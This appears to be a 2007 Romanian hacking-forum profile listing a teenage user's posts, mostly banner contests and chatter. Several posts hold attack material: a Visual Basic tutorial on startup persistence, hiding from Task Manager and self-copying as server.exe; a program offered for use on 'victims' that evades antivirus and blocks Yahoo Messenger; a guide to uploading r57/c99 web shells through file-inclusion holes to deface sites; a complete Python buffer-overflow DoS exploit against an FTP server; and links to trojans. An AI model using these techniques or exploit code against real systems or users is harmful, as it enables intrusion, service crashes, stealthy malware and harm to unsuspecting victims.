Jump to content

vladiii

Active Members
  • Posts

    552
  • Joined

  • Last visited

Everything posted by vladiii

  1. Cateva smecherii in Visual Basic Salut! Desi sunt incepator si eu in Visual Basic, m-am gandit sa scriu acest mic tutorial. Chiar daca nu este cine stie ce de el, macar incerc sa fac ceva bun pentru RST, forum pe care majoritatea vin doar sa invete (si nici macar nu au perseverenta de a invata ceva ca lumea, doar Y!Messenger si Flood sa dea ? ). RST nu mai este ce a fost, nu vreau sa jignesc pe nimeni, dar asta este! Respect deosebit pentru Slick (gg man ). Inca ceva, cum o zis si dizzy, cum ca tutorialul lui nu are rost, deoarece tot ce a scris el gasesti si pe internet, parerea mea, frate, orice tutorial este binevenit si consider ca oricine are ceva de invatat din el ? Sa trecem la treaba! Despre Registrii Ce sunt registrii? Registrii sunt fisiere in care se afla multe dintre setarile Windowsului si ale anumitor programe. Spre exemplu, daca dorim ca My Computer sa se afiseze pe desktop, un key din registrii ia valoare 0 (fals-adica sa nu afiseze pe desktop iconita) sau 1(true, adevarat- afiseaza pe desktop iconita). Si in Visual Basic exista functii de modificare a registriilor si de scriere a unor noi keyuri. Pentru a scrie in registrii in Visual Basic este necesar un modul care trebuie adaugat la program. Un modul se adauga ca in exemplul urmator (exemplul este dat pentru Visual Basic 6.0 ): Project(Alt+p) - Add Module(Alt+m) – Existing si apoi selectati modulul care vreti sa fie adaugat ? Va recomand sa folositi urmatorul modul: [url]ftp://cbmc.ro/samples/vb6/TBRegistry.bas[/url] Modulul este facut de un prieten foarte bun. Ok, acum poate va intrebati cum scrieti in registrii ? Ca sa va faceti o idée despre cum sunt structurati registrii si cum “arata” ei, intrati in CMD si scrieti: regedit . Sa continuam. Daca va uitati un pic in modulul adaugat (si aveti cat de cat habar de Visual Basic) o sa vedeti ca pentru registrii din HKEY_CLASSES_ROOT se foloseste “codul”: &H80000000 , pentru cei din HKEY_LOCAL_MACHINE se foloseste: &H80000002. In fine, va uitati pe acolo si deduceti Acum sa vedem un exemplu concret: RegWrite "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "myapp", "c:\myapp.exe", &H80000002 Acest mic rand de cod, scrie la startup programul C:\myapp.exe cu numele myapp. El scrie in registrul cu adresa: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Care este sintaxa de scriere in registrii? RegWrite “adresa registrului”, “altceva”, “altceva2”, &H8000000*. Sa consideram un alt cod care scrie in registrii un nou status la Y!Messenger (Atentie! Daca scrie in registrii noul status, asta nu inseamna ca messengerul va afisa dupa scriere acel status; pentru aceasta este nevoie de un cod mai complicat pe care nu il voi explica/prezenta in acest tutorial). name = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id") Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + name + "\Custom Msgs", 1, status) Codul acesta functioneaza doar daca aveti optiunea Remember ID&Password activate la messenger. Optiunea status (de la sfarsitului codului de mai sus) reprezinta statusul care doriti a fi scris in registrii (acesta poate fi introdus intr-un textbox sau definit inainte ca o variabila de tip string). Acum sa analizam un pic functia RegRead. Sa consideram urmatorul exemplu: MsgBox RegRead("SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "Cmaudio", &H80000002) Acest cod afiseaza Data corespunzatoare key’ului Cmaudio din locatia de mai sus. Acum sa facem alt mic cod, care afiseaza URL pentru tutoriale specifice Y! Messenger: MsgBox RegRead("Software\Yahoo\pager\YUrl", "Tutorials", &H80000001) Acum sa vedem care a fost ultimul status pe care l-ati avut pe Y!Messenger. Folosim umatorul cod: MsgBox RegRead("Software\Yahoo\pager\profiles\idultaudemess\Custom Msgs\", "1", &H80000001) Pentru incepatori este foarte de ajuns ! Cateva Tips&Tricks Am sa va prezint cateva secvente de cod (utile, zic eu), care poate o sa va ajute in viata de zi cu zi ? 1) Urmatorul cod face invizibil programul (sau formul, dupa caz) si el, desi ruleaza, nu este present pe desktop (doar in Task Manager si Processes): NumeForm.Hide 2) Acest cod face invizibila aplicatia si in Task Manager (in curand o sa public un cod care o sa faca aplicatia invizibila si in Processes): App.TaskVisible = False 3) Codul acesta multiplica aplicatia intr-o locatie specificata de dumneavoastra, in exemplu am ales C:\Windows, cu numele server.exe FileCopy App.EXEName & ".exe", "C:\Windows\server.exe" Cam atat pentru azi! Bafta! Pentru varianta in format .doc, incercati sa o downloadati de aici: [url]http://rapidshare.com/files/34413437/VB_tutorial.doc.html[/url] Tutorialul este adresat incepatorilor, desi nu cred ca o sa il cieasca nimeni, astept pareri Vladiii 2007
  2. vladiii

    Concurs

    hai nu se baga nimeni ?
  3. vladiii

    Concurs

    ehh eu habar n-am sa umblu in photoshop, dar nu aveam ce face aseara si bannerul meu ilustreaza exact tema ceruta, chiar daca e mai sissy si de ce am ales aceasta tema? pentru ca pune in evidenta imaginatia fiecaruia, mai mult decat ceva legat de hacking. in fine, gata cu off-topicurile, de acum incolo (pana vineri) postati doar bannerele
  4. tnx cu nod32 nu l-am scanat, dar cand o sa postez versiunea nedetectabila in processes, o sa il pun nedetectabil si de nod32 mai astept pareri ;d
  5. Nu este virus, dar este un mic programel facut de mine in visual basic [nu este cine stie ce, dar sunt incepator in VB si exersez si eu Deci cand dati programul la victima, la statusul acesteia va aparea: "Nu sunt la calculator momentan. Revin mai tarziu!" (alta idee nu am avut ) si, daca programul ruleaza in continuare, si victima stinge messengerul, nu il va mai putea deschide pana nu inchide procesul corespunzator acestui program. - Este nedetectabil - Porneste la startup - Se multiplica in Windows automat - Invizibil in Task Manager (doar in processes este vizibil) Bun pe lameri Download Link: [url]http://rapidshare.com/files/34294387/program.exe.html[/url] P.S. Va rog sa nu ma injurati, sunt inca incepator Peace ! LE: Incerc sa il fac nedetectabil si in Processes Dar o sa mai dureze ceva timp pana deduc eu toate astea LE2: Cine vrea sa modific mesajul care sa il puna la status sa imi dea un PM
  6. vladiii

    Concurs

    experienta
  7. vladiii

    Concurs

    Nu stiu daca este o idee buna, dar sa zicem ca eu fac acest topic sa ne distram si noi un pic In ce consta topicul? Este un concurs de bannere (in genul acelora de pe supremegfx) Dimensiunile Bannerului nu conteaza, dar in ce consta el? Cum sa arate? Ceva pentru RST, care sa ilustreze tema: "Noi iubim RST )" Ar fi frumos daca ar fi si ceva mai special, o antiteza intre viata si moarte, etc. va dati voi seama. Fiecare posteaza aici bannerul pana vineri, iar in week end userii or sa voteze care este cel mai bun banner. Concursul se va incheia duminica seara Sper sa nu existe discriminari intre persoane, cel mai bun banner sa castige! Postez eu primul banner: P.S. Fiecare user are dreptul sa posteze doar un singur banner si nu are voie sa posteze propria sa imagine
  8. vladiii

    Simple Trojan

    parca ziceai ca nu stii visual basic bun codul, l-am mai vazut pe 100 de siteuri dar aici nu sunt prezentate decat optiunile de trimitere mesaje la victima, dar d'aia e simple
  9. .exe
  10. lool pe siteul oficial costa 150$ mi se pare think again
  11. vladiii

    Votati si voi

    am votat-o de 2 ori, o sa o mai fac cand mi se reseteaza conexiunea
  12. vladiii

    Cati ani ai?

    Serios ? nu
  13. felicitari omule, si acum o intrebare: ti s-a parut greu ? :oops:
  14. [url]http://rapidshare.com/files/33152958/CrackMe.exe.html[/url] dificultate: medie (zic eu) scop: modificarea intervalului la timer ca sa nu mai apara MsgBox cu eroare, apoi introducerea usernameului si voilaa... Crack It! bafta!
  15. Un mic preview: Download it: [url]http://rapidshare.com/files/32582231/TM_10176.zip.html[/url] Cu dedicatie pentru ENCODED
  16. vladiii

    Cati ani ai?

    14 ani, peste 3 luni fac 15
  17. Ce tipuri de shell exista? Sunt doua tipuri de shell foarte importante care se folosesc in majoritatea crackurilor, acestea au 2 nume diferite: c99 si r57. Sa le analizam un pic pe fiecare in parte: 1) r57 shell Spre exemplu, daca gasim o vulnerabilitate intr-un site, cum ar fi Remote File Inclusion, folosim r57 shell, c99 nefiind de niciun folos in cazul de fata. r57 uploadeaza ceva pe server si listeaza apoi continutul directorului de pe server in care se afla fisierul uploadat de tine. Spre exemplu, poti uploada c99 shell, dupa care sa modifici apoi index.php sau mai stiu eu ce. O mica imagine cu r57 shell : Deci spre exemplu gasim un RFI intr-un site, sa zicem: http://sitevulnerabil.com/vulnpath=adresa de la shell Ok, pana aici nimic nou, doar am gasit vulnerabilitatea si am pus la URL r57 shell. Ce facem mai departe? Ideea este sa uploadam ceva, nu? De preferat ar fi sa uploadam un c99 shell, dar asta depinde de fiecare. Cum uploadam ceva? Uite aici un exemplu: Dam click pe butonul Browse din exemplu, selectam din calculator ce vrem sa uploadam si dam Upload si voila... Ceea ce am uploadat se va gasi pe server si poate fi accesat sin URL. Sa presupunem ca am uploadat c99.php. Sa continuam cu analiza lui 2) c99 shell Urmatoarea poza ilustreaza un c99 shell: In exemplul de mai sus nu se vede prea bine, dar in casuta in care se listeaza paginile .php si directoarele, in partea dreapta, sunt vreo casute (in dreptul fiecaruia) si mi se pare (nu mai stiu, m-am lasat de hacking:) ) ca pe al 2-lea buton daca dai o sa iti afiseze codul sursa, pe care il modifici dupa bunul plac si apoi dai Save. In exemplul din imagine ai drept si de citire, si de scriere, si de executare (drwx si rwx). Pe unele shelluri s-ar putea sa nu poti sa faci aceste lucruri. Cam atat pentru azi vladiii 2007
  18. Download it from: [url]http://rapidshare.com/files/32321924/AOL_8_Kit.zip.html[/url] M-am gandit sa-l uploadez pentru ca pe internet nu se gaseste la download si nici pe forum nu l-am vazut! bafta!
  19. asta e cam tot ce am gasit, ce este misto, este scump, dar nici astea nu sunt de aruncat (adica mie imi plac, nu stiu tie): 1) http://www.freetemplatesonline.com/templates/category/57/page1.html Gasesti aici un singur template free pentru OsCommerce 2) http://www.templatemonster.com/free-templates.php Gasesti si aici tot un singur template pentru OsCommerce, dar mai jos si unul pentru Zen Cart foarte dragut 3) http://www.unbeatabletemplates.com/ Aici mai gasesti cateva OsCommerce dragute si ieftine (sub 10$) Mai mult nu te pot ajuta, sorry :wink:
  20. vladiii

    0 Day Trojan

    [url]http://www.geocities.com/rude_bx/Tut/0daytrojan.htm[/url] Simple Trojan using 0 day recently Animated Cursor Handling Exploit (0day) (Version3) by jamikazu was released.I used it to make a 0day Tr0jan in visualbasic.
  21. from socket import * from sys import exit print '[*] Telnet-Ftp Server 1.0 (RETR) 0day DoS Exploit' print '[*] Bug found by Necro ' host = '127.0.0.1' port = 21 username = 'necro' password = 'test' evil = 'RETR' + '\x20' + '\x41' * 1000 + '\r\n' s = socket(AF_INET, SOCK_STREAM) try: s.connect((host, port)) except: print '\n[-] Connection refused !' exit() s.recv(1024) s.send('USER' + '\x20' + username + '\r\n') s.recv(1024) s.send('PASS' + '\x20' + password + '\r\n') s.recv(1024) s.send(evil) s.close() print '[+] Done, deamon shutdown.'
  22. multam' avkhackteam... sunt incepator in visual basic, dar sper sa incep sa ma descurc... mai astept pareri
  23. Un mic Port Scanner rapid facut de mine in Visual Basic. Download It: http://rapidshare.com/files/32199866/portscanner.exe.html
  24. BV daca e asa... da-mi si mie un PM cu functia de scriere in registrii pentru startup nedetectabila mersi anticipat
  25. pai facusem si eu unul mai demult la fel care nu era detectat de nimic, dar cand ii bagam o functie sa scrie in registrii, poc sarea AV... banuiesc ca al tau nu scrie in registrii nimic (adica sa porneasca la startup, macar) si nu face nimic mai mult decat un keylogger normal in ce e facut ? oricum, felicitari pentru idee si efort !
×
×
  • Create New...